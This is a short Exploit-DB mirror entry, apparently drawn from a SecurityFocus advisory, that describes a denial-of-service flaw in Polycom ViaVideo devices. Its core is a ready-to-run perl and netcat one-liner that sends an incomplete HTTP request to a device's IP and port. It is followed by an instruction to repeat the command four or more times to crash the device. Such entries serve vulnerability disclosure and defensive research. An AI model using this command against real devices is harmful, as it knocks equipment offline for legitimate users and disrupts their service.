exploit-db-mirror/exploits/hardware/dos/21939.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

9 lines
No EOL
475 B
Text

source: http://www.securityfocus.com/bid/5962/info
Polycom ViaVideo devices are prone to a denial of service condition upon receipt of numerous incomplete HTTP requests. This may restrict availability of the device for legitimate users.
The device may need to be restarted to regain normal functionality.
perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
Issue the above command four or more times to cause the denial of service condition.